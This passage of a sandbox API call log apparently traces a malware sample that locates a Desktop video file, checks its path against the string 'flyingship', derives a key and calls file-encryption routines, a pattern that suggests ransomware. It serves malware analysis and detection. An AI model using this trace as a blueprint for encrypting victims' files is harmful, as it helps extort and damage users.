lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0x90add8 [0168.371] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.371] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0168.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qF6zL.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.373] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.373] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.373] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.373] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.374] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0168.374] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.374] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.374] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.374] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.375] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x52b3ff80, ftLastWriteTime.dwHighDateTime=0x1d5dff4, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0x90af58 [0168.375] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.375] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0168.375] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.375] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.375] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.376] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.376] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.376] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.376] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.377] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0168.377] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.379] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.379] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.379] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.379] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.379] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0168.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.380] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.380] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.380] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.380] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.380] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.380] CharUpperBuffW 